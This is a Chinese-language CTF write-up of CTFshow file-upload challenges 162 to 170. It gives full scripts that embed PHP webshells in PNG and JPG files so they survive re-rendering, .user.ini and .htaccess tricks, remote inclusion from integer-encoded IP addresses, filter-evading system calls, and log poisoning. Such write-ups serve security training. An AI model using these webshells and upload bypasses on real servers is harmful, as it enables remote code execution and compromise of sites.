一、知识点
1、文件上传-二次渲染
2、文件上传-简单免杀变异
3、文件上传-.htaccess妙用
4、文件上传-PHP语言特性
二、详细点
1、前置知识
后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码 ( 解析漏洞除外 )
如: jpg 图片里面有 php 后门代码,不能被触发,所以连接不上后门
===> 如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,以及.user.ini&.htaccess
===> .htaccess文件只能用于apahce,不能用于iis和nginx等中间件
===> .user.ini只能用于Server API为FastCGI模式下,而正常情况下apache不是运行在此模块下
2、文件二次渲染
1)判断上传前和上传后的文件大小及内容
2)判断上传后的文件返回数据包内容
3、PHP删除规则
1、什么都删除:文件实际上是删除成功的,但是被系统或者后台删除,那么在没删除的之前,文件时存在,可以进行正常的操作
2、后门代码删除:如例题ctf-163题,直接删除png包含的路径,可以改成.user.ini进行包含
3、如果是“什么都删除”的情况,则只能使用条件竞争的方式进行处置;若为“后门代码删除”的情况,则可将后门代码写入到不会删除的文件中进行处置
条件竞争:如果上传的文件在upload路径下会被删除,那么可以在删除前一直访问这个路径下要上传的文件,并且传输代码(利用代码创建一个新文件)。
只要一直访问路径且传输代码,并且在旧文件上传成功的那一刹那,访问到该文件就可以执行代码创建新的文件,将新文件放到根目录/不会自动删除的目录下/直接利用代码查看flag。
三、案例演示
1、CTFshow-162:突破过滤
1)具有文件头检测,添加GIF89A文件头可以上传。
2)过滤了; () [] {} . 等符号
解题思路:
1)通过.user.ini包含png文件,png文件包含远程可执行文件
2)将后门代码写在index.txt文件里面,但是 .号也被过滤了,因此需要将IP地址转换成数字,这样就不存在 .了
在线IP地址转换: 在线ip转int,ip转数字-BeJSON.com
3)利用远程包含 IP 转换地址后调用执行
.user.ini :GIF89a auto_prepend_file=png
png: GIF89a <?=include'http://1385994699/' ?>
2、CTFshow-163:突破上传过滤
过滤 . () {}等 同时文件被删除,png上传成功后会自动删除
解题思路:
直接利用.user.ini包含远程
.user.ini:GIF89A auto_prepend_file=http://7947500069
3、CTFshow-164:png二次渲染
解题思路:
该题考点是对png图片的二次渲染。因为图片上传后经过渲染,内容发生了改变,后门脚本就无法执行。
1)在上传两个不同的png后发现,一个成功但是另一个会失败,说明有上传文件大小的限制,那么可以初步推断有二次渲染。并且查看文件上传后的大小,明显不太一样。
2)利用c32asm明显发现图片发生了变化,这就代表图片进行了二次渲染
手工虽然也能够绕过二次渲染,但是几率不大,运气不好的时候可能要多次尝试
建议用脚本注入后门,这样绕过的几率会大一些
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'2.png'); //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
*/
?>
将要修改的图片放在代码同目录,然后运行即可
get 0=system
post 1=tac flag.php
注意:
1、将后门代码写入图片(前提是读取文件是通过php解析,导致后门代码可执行)
2、如果注入的URL是路径地址类型:htpp://6938f258-ebf8-4b48-8eb8-d80b61f6d600.challenge.ctf.show/upload/xxx.png
===> 类似于文件包含,图片被文件包含,图片中后门代码会被弃用
===> 需要使用.user.ini来配合解析执行png文件
4、CTFshow-165:jpg二次渲染
<?php
$miniPayload = "<?=eval(\$_POST[1]);?>";
if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
die('php-gd is not installed');
}
if(!isset($argv[1])) {
die('php jpg_payload.php <jpg_name.jpg>');
}
set_error_handler("custom_error_handler");
for($pad = 0; $pad < 1024; $pad++) {
$nullbytePayloadSize = $pad;
$dis = new DataInputStream($argv[1]);
$outStream = file_get_contents($argv[1]);
$extraBytes = 0;
$correctImage = TRUE;
if($dis->readShort() != 0xFFD8) {
die('Incorrect SOI marker');
}
while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
$marker = $dis->readByte();
$size = $dis->readShort() - 2;
$dis->skip($size);
if($marker === 0xDA) {
$startPos = $dis->seek();
$outStreamTmp =
substr($outStream, 0, $startPos) .
$miniPayload .
str_repeat("\0",$nullbytePayloadSize) .
substr($outStream, $startPos);
checkImage('_'.$argv[1], $outStreamTmp, TRUE);
if($extraBytes !== 0) {
while((!$dis->eof())) {
if($dis->readByte() === 0xFF) {
if($dis->readByte !== 0x00) {
break;
}
}
}
$stopPos = $dis->seek() - 2;
$imageStreamSize = $stopPos - $startPos;
$outStream =
substr($outStream, 0, $startPos) .
$miniPayload .
substr(
str_repeat("\0",$nullbytePayloadSize).
substr($outStream, $startPos, $imageStreamSize),
0,
$nullbytePayloadSize+$imageStreamSize-$extraBytes) .
substr($outStream, $stopPos);
} elseif($correctImage) {
$outStream = $outStreamTmp;
} else {
break;
}
if(checkImage('payload_'.$argv[1], $outStream)) {
die('Success!');
} else {
break;
}
}
}
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');
function checkImage($filename, $data, $unlink = FALSE) {
global $correctImage;
file_put_contents($filename, $data);
$correctImage = TRUE;
imagecreatefromjpeg($filename);
if($unlink)
unlink($filename);
return $correctImage;
}
function custom_error_handler($errno, $errstr, $errfile, $errline) {
global $extraBytes, $correctImage;
$correctImage = FALSE;
if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
if(isset($m[1])) {
$extraBytes = (int)$m[1];
}
}
}
class DataInputStream {
private $binData;
private $order;
private $size;
public function __construct($filename, $order = false, $fromString = false) {
$this->binData = '';
$this->order = $order;
if(!$fromString) {
if(!file_exists($filename) || !is_file($filename))
die('File not exists ['.$filename.']');
$this->binData = file_get_contents($filename);
} else {
$this->binData = $filename;
}
$this->size = strlen($this->binData);
}
public function seek() {
return ($this->size - strlen($this->binData));
}
public function skip($skip) {
$this->binData = substr($this->binData, $skip);
}
public function readByte() {
if($this->eof()) {
die('End Of File');
}
$byte = substr($this->binData, 0, 1);
$this->binData = substr($this->binData, 1);
return ord($byte);
}
public function readShort() {
if(strlen($this->binData) < 2) {
die('End Of File');
}
$short = substr($this->binData, 0, 2);
$this->binData = substr($this->binData, 2);
if($this->order) {
$short = (ord($short[1]) << 8) + ord($short[0]);
} else {
$short = (ord($short[0]) << 8) + ord($short[1]);
}
return $short;
}
public function eof() {
return !$this->binData||(strlen($this->binData) === 0);
}
}
?>
上传jpg图片,访问图片并进行抓包,通过回显可以发现是通过php的内置函数进行二次渲染
利用php的脚本对图片进行渲染,并会在目录下形成一个payload图片
php.exe jpg.php 2.jpg
查看图片可以发现带有后门脚本
直接上传图片,利用后门代码获取flag即可
5、CTFshow-166:zip调用包含
解题思路:
该关只允许上传zip文件,那么将zip文件的压缩包内容改为后门脚本即可
6、CTFshow-167:.htaccess文件的妙用
.htaccess默认不支持nginx,设置后支持
.htaccess可以通过设置实现文件解析配置
将png后缀的文件解析成php
AddType application/x-httpd-php .png
解题思路:
1)直接上传jpg文件并修改内容为后门脚本
2)上传.htaccess文件,让jpg文件内容以php代码执行。
7、CTFshow-168:免杀后门
解题思路:
过滤system关键字,只要利用变量将system拆分再重组即可
<?php $a='syste'.'m';$a('tac ../flagaa.php') ?>
7、CTFshow-169,170:日志包含
解题思路:
1)构造.user.ini利用条件:需要上传index.php 内容随意 index可以自动调用.user.ini
2)上传.user.ini包含日志:auto_prepend_file=/var/log/nginx/access.log
3)访问地址带后门UA头写入日志:
上传.user.ini是利用文件包含
上传.htaccess是利用文件解析漏洞